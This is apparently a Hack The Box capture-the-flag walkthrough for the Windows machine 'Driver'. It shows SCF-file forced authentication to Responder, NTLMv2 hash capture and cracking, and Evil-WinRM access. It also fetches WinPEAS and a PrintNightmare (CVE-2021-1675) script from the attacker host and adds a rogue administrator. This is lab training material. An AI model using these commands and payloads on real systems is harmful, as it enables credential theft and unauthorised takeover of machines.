HTB - Driver
Hack The Box - Driver
Nmap Scanning
Lets scan the host with nmap to gather the information about the running services,
┌──(kali㉿aidenpearce369)-[~]
└─$ nmap -sC -sV 10.10.11.106 -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-22 08:16 EST
Nmap scan report for 10.10.11.106
Host is up (0.32s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-02-22T20:20:52
|_ start_date: 2022-02-22T20:19:24
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 7h03m58s, deviation: 0s, median: 7h03m57s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.48 seconds
Seems like we have 3 open ports
Enumeration
Lets go to the web service running on port 80
This server is running on Microsoft-IIS/10.0 and also we could not find any exploits for this version by searching exploits on searchsploit
While loading this page, it prompts for authentication
By trying the credentials admin:admin, we could login easily
Its just a default guessable username and password, it works since it is an easy level machine
After searching all the tabs, this seems something relevant
This file upload does not blacklist the extension, this made me to try php web reverse shell but no luck
Tried querying the URL parameter, it looks like a rabbit hole
Since, we are using SMB service, its better to test for Relay Attacks
Lets run a nmap nse script to check the SMB is vulnerable to relay attack or not
┌──(kali㉿aidenpearce369)-[~]
└─$ sudo nmap -p 445 10.10.11.106 -sS --script smb-security-mode.nse
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-22 09:58 EST
Nmap scan report for 10.10.11.106
Host is up (0.31s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Nmap done: 1 IP address (1 host up) scanned in 3.16 seconds
Here the message signing is disabled, which is set by default
This is a common attack vector when it comes to Enterprise level security, where attackers aim SMB shares to grab the NTLMv2 hashes and relay it to other servers for malicious activities
By enabling SMB signing, each and every packet is digitally signed to ensure the authenticity and integrity and it prevents MITM attacks with responder and relayers
Gaining access
We found a possible good attack vector to gain NTLMv2 hash, but we need a medium to trigger our attack vector
To get our NTLMv2 hash, we need to make the Windows machine to probe for data from shares so that we can perform MITM attack with responder to gain the user’s NTLMv2 hash
Firing up responder,
┌──(root💀aidenpearce369)-[/home/kali]
└─# responder -rfw -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.7.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
Fingerprint hosts [ON]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.3]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-6PMAFV4ZDLE]
Responder Domain Name [ZRTF.LOCAL]
Responder DCE-RPC Port [45028]
[+] Listening for events...
Now, we have set up our responder and it is actively listening the network traffic
The next step we have to do is, force authenticate the end user to trigger the SMB probe call to our responder
These are some good Forced Authentication Techniques
For more information on SCF file attack via SMB
Lets create a scf file to trigger the MITM request from victim
The Shell Command File will have a UNC path, where we will be providing a fake/real SMB share path to trigger the victim machine to make a request and make our responder to ask its NTLMv2 hash
Other attack vectors for forced authentication requires user interaction to gain access, but here the SCF file will be executed automatically whenever the file is browsed through desktop process
[Shell]
Command=2
IconFile=\\10.10.14.3\dummyshare\dummyfile
[Taskbar]
Command=ToggleDesktop
Here we have used a fake SMB path, when the SCF gets triggered, it will pass the NTLMv2 hash to responder
After uploading it into the web interface,
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:b530df1f315da28c:EB7627FD85DDE09CBBAC2DBFD90D2CBF:0101000000000000000676F7E927D80181B1967E49193D590000000002000800460034004C00520001001E00570049004E002D00560030004600350059004C005900430034005000490004003400570049004E002D00560030004600350059004C00590043003400500049002E00460034004C0052002E004C004F00430041004C0003001400460034004C0052002E004C004F00430041004C0005001400460034004C0052002E004C004F00430041004C0007000800000676F7E927D80106000400020000000800300030000000000000000000000000200000BFE945171315DD47E04093ECBB9DE8369D3616D5AAB51056ADE3C58DDB972FF80A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003300000000000000000000000000
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
...
So we got a NTLMv2 hash for a user named tony on DRIVER machine
If we try SMB relaying attack it would fail,
┌──(root💀aidenpearce369)-[/home/kali]
└─# smbrelayx.py -h 10.10.11.106 -c whoami
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
[*] Running in relay mode
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.11.106, attacking target 10.10.11.106
[-] Authenticating against 10.10.11.106 as DRIVER\tony FAILED
Instead of SMB relay attack, we could crack the NTLMv2 hash with john
Lets crack this hash
──(kali㉿aidenpearce369)-[~/HTB/Driver]
└─$ john hash.txt -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
No password hashes left to crack (see FAQ)
┌──(kali㉿aidenpearce369)-[~/HTB/Driver]
└─$ john hash.txt --show
tony:liltony:DRIVER:e31d5fd2827c0dab:FC4F840D0A31C7D80B873C058C742336:010100000000000000DEE093D327D801BCC172CC7A390F37000000000200080052004F005500390001001E00570049004E002D004500310053003500490045005400430045003600470004003400570049004E002D00450031005300350049004500540043004500360047002E0052004F00550039002E004C004F00430041004C000300140052004F00550039002E004C004F00430041004C000500140052004F00550039002E004C004F00430041004C000700080000DEE093D327D80106000400020000000800300030000000000000000000000000200000BFE945171315DD47E04093ECBB9DE8369D3616D5AAB51056ADE3C58DDB972FF80A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003300000000000000000000000000
1 password hash cracked, 0 left
Now, we got the plain text password from the hash and lets use it to authenticate into the machine with username
Lets use Evil-WinRM which is an alternate for PS-Remoting in Linux,
To install it,
┌──(root💀aidenpearce369)-[/home/kali/HTB/Driver]
└─# gem install evil-winrm
Authenticating as tony on DRIVER machine
┌──(root💀aidenpearce369)-[/home/kali/HTB/Driver]
└─# evil-winrm -i 10.10.11.106 -u tony -p liltony
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents> whoami
driver\tony
*Evil-WinRM* PS C:\Users\tony\Documents> hostname
DRIVER
We can use this docker container as an alternative for Evil-WinRM
Privilege Escalation
We have gained access on this machine, the next thing we can do is check for privileges
*Evil-WinRM* PS C:\Users\tony\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
*Evil-WinRM* PS C:\Users\tony\Documents>
We have to escalate our privileges, lets try WinPEAS
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-WebRequest "http://10.10.14.3:8000/winPEASany.exe" -OutFile winpeas.exe
*Evil-WinRM* PS C:\Users\tony\Documents> dir
Directory: C:\Users\tony\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/22/2022 3:46 PM 1931776 winpeas.exe
No luck running WinPEAS
Lets look for running process to get some idea
*Evil-WinRM* PS C:\Users\tony\Documents> ps
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
40 4 1904 1392 ...67 2.09 1500 cmd
113 10 10440 6776 ...45 4.20 2524 conhost
309 13 1176 4184 ...02 344 csrss
259 18 1180 4076 ...08 460 csrss
203 13 3364 12076 ...02 2260 dllhost
334 26 31308 49976 ...99 808 dwm
500 27 8472 30756 ...32 0.27 356 explorer
1398 59 16848 62180 ...66 28.45 2888 explorer
493 27 8584 30688 ...31 0.34 3652 explorer
516 34 10196 35340 ...44 0.22 5092 explorer
0 0 0 4 0 0 Idle
1016 23 5356 15212 ...01 576 lsass
173 13 2316 8836 ...95 2476 msdtc
474 38 15100 43120 303 3.39 4668 OneDrive
55 6 724 3324 ...65 0.02 764 PING
299 18 6604 23368 ...80 1.16 3080 RuntimeBroker
683 45 23012 27716 ...32 2680 SearchIndexer
745 47 30208 70740 33076 0.78 3564 SearchUI
183 12 2600 10420 ...02 1344 sedsvc
245 10 2692 6492 ...74 568 services
642 31 13956 46624 252 0.67 3444 ShellExperienceHost
346 15 3484 17816 ...47 1.20 3064 sihost
49 3 336 1168 ...56 268 smss
381 22 5216 13912 ...13 1208 spoolsv
533 20 4972 17052 ...17 660 svchost
509 17 3328 8924 ...90 712 svchost
649 48 7820 20472 ...26 752 svchost
1330 54 15968 39004 ...41 832 svchost
594 27 11144 18484 ...36 872 svchost
211 16 2004 8352 ...96 936 svchost
423 21 4776 17740 ...46 944 svchost
765 27 6116 14196 ...39 992 svchost
489 42 13648 24380 ...63 1376 svchost
127 11 3048 9280 ...97 1568 svchost
183 15 3408 9916 ...04 1624 svchost
185 15 3504 15196 ...57 1632 svchost
295 20 5224 19332 ...14 1640 svchost
172 12 2048 12292 ...26 0.05 2088 svchost
116 9 1276 6136 ...77 3004 svchost
99 7 1156 5976 ...87 4228 svchost
844 0 120 140 3 4 System
273 28 4476 13640 ...16 0.61 2000 taskhostw
138 11 2660 10432 ...22 1736 VGAuthService
100 8 1368 6048 ...28 1324 vm3dservice
108 7 1352 5540 ...06 1668 vm3dservice
333 23 9432 21784 ...52 1660 vmtoolsd
211 18 4904 15100 ...67 1.84 4632 vmtoolsd
87 9 960 4732 ...74 452 wininit
182 9 1808 8788 ...22 504 winlogon
325 19 9120 19148 ...96 2392 WmiPrvSE
2736 36 81356 103440 ...73 2.91 4808 wsmprovhost
219 10 1540 7152 ...92 1064 WUDFHost
*Evil-WinRM* PS C:\Users\tony\Documents>
Seems like we are running spoolsv service, which has Print Nightmare Exploit
*Evil-WinRM* PS C:\Users\Administrator\Desktop> Get-Service -Name Spooler
Status Name DisplayName
------ ---- -----------
Running Spooler Print Spooler
So we are definitely running a Print Spooler service
Lets use this CVE-2021-1675 PowerShell script to perform LPE
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-WebRequest "http://10.10.14.3:8000/CVE-2021-1675.ps1" -OutFile lpe.ps1*Evil-WinRM* PS C:\Users\tony\Documents> . .\lpe.ps1
File C:\Users\tony\Documents\lpe.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:3
+ . .\lpe.ps1
+ ~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess
Bypassing the execution policy to run PowerShell scripts and using this LPE exploit to add our new user into localgroup of Administrators
*Evil-WinRM* PS C:\Users\tony\Documents> $env:PSExecutionPolicyPreference="bypass"
*Evil-WinRM* PS C:\Users\tony\Documents> . .\lpe.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare -DriverName "DummyBhava" -NewUser "aidenpearce369" -NewPassword "thenameisMonish"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user aidenpearce369 as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
*Evil-WinRM* PS C:\Users\tony\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator aidenpearce369 DefaultAccount
Guest tony
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\tony\Documents> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
aidenpearce369
The command completed successfully.
Post Exploitation
We have created a new user and also added it into the localgroup of Administrators
Now lets login as our new admin user,
┌──(root💀aidenpearce369)-[/home/kali/HTB/Driver]
└─# evil-winrm -i 10.10.11.106 -u aidenpearce369 -p thenameisMonish
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> whoami
driver\aidenpearce369
*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> hostname
DRIVER
*Evil-WinRM* PS C:\Users\aidenpearce369\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
*Evil-WinRM* PS C:\Users\aidenpearce369\Documents>
Extracting secrets from this machine,
*Evil-WinRM* PS C:\Users\tony\Desktop> dir
Directory: C:\Users\tony\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/22/2022 12:19 PM 34 user.txt
*Evil-WinRM* PS C:\Users\tony\Desktop> more user.txt
<USER FLAG>
*Evil-WinRM* PS C:\Users\tony\Desktop> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/22/2022 12:19 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> more root.txt
<ROOT FLAG>